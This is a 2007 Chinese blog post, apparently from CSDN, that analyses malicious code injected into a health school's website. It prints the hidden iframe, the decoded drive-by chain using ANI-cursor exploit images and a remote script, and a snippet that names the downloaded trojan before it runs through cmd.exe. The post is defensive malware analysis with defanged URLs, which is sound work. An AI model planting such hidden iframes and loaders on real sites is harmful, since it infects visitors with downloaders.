某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码

最新推荐文章于 2024-07-12 14:10:05 发布
最新推荐文章于 2024-07-12 14:10:05 发布
阅读量1.4k 收藏
点赞数
分类专栏: 系统安全 文章标签: javascript 解密 div iframe url function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1592281
版权

endurer 原创
2007-04-29  第1

植入的代码为:
/---
<iframe src=hxxp://www.1**8d*m***m.com/d***m*/kehu0739.htm width=0 height=0>
---/

kehu0739.htm的内容所用代码为US-ASCII。

http://purpleendurer.ys168.com 下载 US-ASCII加密、解密程序 解密后得到的内容包含代码:
/---
<DIV id=new_content_jp style="DISPLAY: none">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39a.jpg')">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39b.jpg')"></DIV></DIV></DIV>
<SCRIPT language=javascript src="hxxp://www.1**8d*m***m.com/wangma/39.js"></SCRIPT>
<iframe src=hxxp://www.1**8d*m***m.com/wangma/061439.htm width=0 height=0></iframe>
---/

hxxp://www.1**8d*m***m.com/wangma/39a.jpg(Kaspersky 报为 Exploit.Win32.ImG-ANI.ac)和 39b.jpg 利用 ANI漏洞 下载Hxxp://1**8d*m***m.com/xi*a***/kehu0739.exe


文件说明符 : D:/test/kehu0739.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-29 17:32:50
修改时间 : 2007-4-29 17:38:32
访问时间 : 2007-4-29 17:40:1
大小 : 16603 字节 16.219 KB
MD5 : defe53aaf22ed8273236c45b562f2628

UpackByDwing

Kaspersky 报为 Trojan-Downloader.Win32.Delf.bho

hxxp://www.1**8d*m***m.com/wangma/39.js
每隔300毫秒执行自定义函数checkIE(),checkIE()检测IE版本,并写入代码
/---
<div style=/"cursor: url(/'hxxp://www.1**8d*m***m.com/wangma/39a.jpg/')/"><div style=/"cursor: url(/'hxxp://www.1**8d*m***m.com/wangma/39b.jpg/')/">
---/


hxxp://www.1**8d*m***m.com/wangma/39a.jpg 和 39b.jpg(Kaspersky 均报为 Exploit.Win32.ImG-ANI.ac)同样是利用ANI漏洞下载 kehu0739.exe。

hxxp://www.1**8d*m***m.com/wangma/061439.htm 内容所用代码为US-ASCII。

解密后的内容为Javascript脚本代码,功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 kehu0739.exe,保存到%windir%,文件名为 rising****.exe,其中****为 数字,由自定义函数:

/---
function fk(n){var number = Math.random()*n;
return Math.round(number)+'.exe';}
---/
生成。然后通过 Shell.Application 对象Q 的 ShellExecute 方法 执行命令: %windir%/system32/cmd.exe /c %windir%/rising****.exe 来运行。 

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
trojan-1.16.0-win.zip
04-01
trojan
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj/Worm.Viking.sv等
Purpleendurer@CSDN
05-14 3393
endurer 原创2007-05-14 第1版该网站的网页是保存了腾讯官方网站的内容后进行修改的,相当具有迷惑性。在网页中发现代码:<iframe src="hxxp://www.p***um**a163**.com/p***u/1248481.htm" width="0" height="0" frameborder="0"></iframe><iframe src="hxxp:/
一个会下载至少3个Viking等恶意程序的网站
Purpleendurer@CSDN
06-07 1831
endurer 原创2007-06-07 第1版有网友说他的电脑打开某个网站后不久,杀毒软件的实时监控被关闭,系统时间被修改,接着安装各种网络游戏和聊天账号的盗号木马。检查该网站首页代码,发现:/---if(parent.window.opener) parent.window.opener.location=hxxp://aa***a.sqr***s11**0.com/;……(略)…
ARP病毒加的网址利用雅虎通Webcam Viewer ActiveX控件远程栈溢出漏洞传播Worm.Delf.yqz
Purpleendurer@CSDN
06-11 3169
endurer 原创2007-06-11 第1版今天在使用Web邮箱时,Kaspersky报告:/---已检测到: 恶意程序 Exploit.HTML.Ascii.o URL: hxxp://mm***.98*7**99***9.com/mm/a.htm---/Google搜索了一下,发现此代码是一种ARP病毒添加的。检查发现网页都被加入了代码:/---<iframe SRC="hxx
js基础一
wyl_1483061559的博客
04-15 133
<html> <head> <meta http-equiv="refresh" content="2"> <script type="text/javascript"> var var01=1; function funtst(){ document.write(var01);//undefined v
ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
Purpleendurer@CSDN
07-31 1879
ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码endurer 原创2007-07-31 第1版前两天,一位网友反映他最近打开网页显示都是乱码。让他把网页源代码传过来分析,发现网页首部被加入代码:/---<iframe src=hxxp://**.9**-*6*.in/n.js width=1 height=1></iframe>---/hxxp
Trojan-Downloader.Win32.Generic.a...
06-08
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
Trojan-Qt5-Windows.zip
03-14
V0.0.4c The Emergency Bug Fix for V0.0.4b V0.0.4b的紧急Bug修复 @TheWanderingCoel TheWanderingCoel released this 3 hours ago This is a version only contain these bug fixes: [Bug Fix] Fix Safari ...
JavaScript之对象(二)
Wind_waving的博客
02-22 120
js内部具体对象及其成员: String对象:需要创建实例来调用其属性和方法。也可以在用引号括起来的字符串后直接加上" . "来调用String的属性方法。 属性:length; 方法:anchor,big,在字符串两边加上相应的HTML标签对;bold,fontcolor,将字符串转换为HTML代码;charAt返回指定字符的位置;indexOf返回某字符串在对象中第一次出现的位...
Windows更新网站被黑还是被ARP病毒捉弄了?Virus.Win32.AutoRun.am
Purpleendurer@CSDN
07-11 2032
Windows更新网站被黑还是被ARP病毒捉弄了?Virus.Win32.AutoRun.amendurer 原创2007-07-11 第1版今早打开电脑,发现有Windows更新,自动更新速度有点慢,于是手动打开http://www.windowsupdate.com/,不料看到的是一堆乱码~选择开始菜单中的“Windows Update”,打开 http://windowsupda
某市国税信息检索系统被植入传播Worm.Win32.Delf.bs的代码
Purpleendurer@CSDN
04-26 1503
endurer 原创2007-04-26 第1版植入代码为:/---<IFRAME src="hxxp://www.hao12**3**hao1**23.cn/ok/index.htm" frameBorder=0 width=0 height=0></IFRAME>---/hxxp://www.hao12**3**hao1**23.cn/ok/index.htm 标题为:爱恋千雪,包含代
vue2 实现原生 WebSocket
weixin_38797742的博客
07-11 317
原生WebSocket: new WebSocket。
vue 自定义滚动条同步拖动(移动端)
最新发布
u014206461的博客
07-12 158
vue 自定义滚动条同步拖动(移动端)
Webkit简介以及工作流程
读心悦
07-10 328
WebKit是一个开源的浏览器引擎,最初由苹果公司基于KHTML(K Desktop Environment的HTML渲染引擎)开发,并广泛应用于Safari浏览器。随着时间的推移,WebKit也被其他多款浏览器和应用所采用,成为Web技术生态中的重要一员。WebKit的核心功能包括解析HTML、CSS、JavaScript等网页内容,并将其渲染为可视化的网页页面。它主要由WebCore(负责HTML解析、CSS样式计算和布局)和JavaScriptCore(负责JavaScript解释执行)两大部分组成。
在项目中,如何使用springboot+vue+springsecurity+redis缓存+Axios+MySQL数据库+mybatis
huanghm88的专栏
07-11 687
在Spring Boot中,可以使用Spring Data JPA和MyBatis来配置MySQL数据库。在Vue项目中,可以创建一个config.js文件来配置后端的API地址,然后在需要发送请求的地方使用Axios发送请求。根据业务需求,在Spring Boot中编写相应的接口和服务层代码,包括数据访问、业务逻辑等。在Vue中,可以使用Axios发送HTTP请求,并将响应的数据展示在前端页面上。分别启动后端的Spring Boot应用和前端的Vue应用,访问前端页面,就可以看到与后端进行通信的效果。
前端 JS 经典:迭代器
weixin_64684095的博客
07-12 200
如果在最后一个值返回后再调用 next()方法,那么返回的对象中属性 done 的值为 true,属性 value 则包含迭代器最终返回的值(如果没有相关数据则返回 undefined)。可迭代对象具有 Symbol.iterator 属性,通过指定的函数可以返回一个作用于附属对象的迭代器。JavaScript 中有一些内置的可迭代对象,如数组、字符串、集合(Set)、映射(Map)等,它们都具有默认的迭代器。在 JavaScript 中,迭代器是一个对象,它定义了一个序列,并在终止时可能返回一个返回值。
Vue3 使用 Vue Router 时,prams 传参失效和报错问题
专注基础架构领域
07-12 463
我尝试使用 prams 传递数据当我跳转页面时,得到的 prams 数据为空 ,控制台也出现了 Vue Router 的警告点开链接后发现了原因,。也就是说,从Vue Router的2022-8-22 这次更新后,我们使用上面的方式在新页面无法获取:vue也给我们提出了解决方案:使用 query 的方式传参只要改成query 传参就好了,注意query传参只能用路由表中的 path ,不是 name ,并且所有参数都会显示在URL 地址上。将参数放在 pinia 或 vuex仓库里。
TS类型声明文件(二)如何在 TS 中导入导出局部类型
weixin_43303603的博客
07-10 259
系列文章之:如何在 TypeScript 中导入导出局部类型
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
06-09
首先,关闭所有正在运行的程序,然后按照以下步骤手动查杀Trojan-Downloader.Win32.Agent.bbb木马: 1. 打开任务管理器,结束所有Trojan-Downloader.Win32.Agent.bbb木马相关进程。 2. 删除Trojan-Downloader.Win32.Agent.bbb木马相关的注册表项。在开始菜单中输入“regedit”打开注册表编辑器,找到以下路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,删除其中所有值名为“Trojan-Downloader.Win32.Agent.bbb”的键值。 3. 删除Trojan-Downloader.Win32.Agent.bbb木马相关的文件。在开始菜单中输入“cmd”打开命令提示符,输入“dir %SystemDrive%\ /a /s /b | findstr Trojan-Downloader.Win32.Agent.bbb”查找所有Trojan-Downloader.Win32.Agent.bbb木马相关的文件,并删除它们。 4. 清除系统垃圾文件。在开始菜单中输入“cleanmgr”打开磁盘清理工具,选择要清理的磁盘,并勾选“临时文件”、“下载文件”等垃圾文件,点击“确定”清理系统垃圾文件。 5. 更新杀毒软件并进行全盘扫描,确保系统没有其他病毒和恶意软件。 6. 最后,重启电脑,确保所有更改生效并且Trojan-Downloader.Win32.Agent.bbb木马已经被完全清除。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值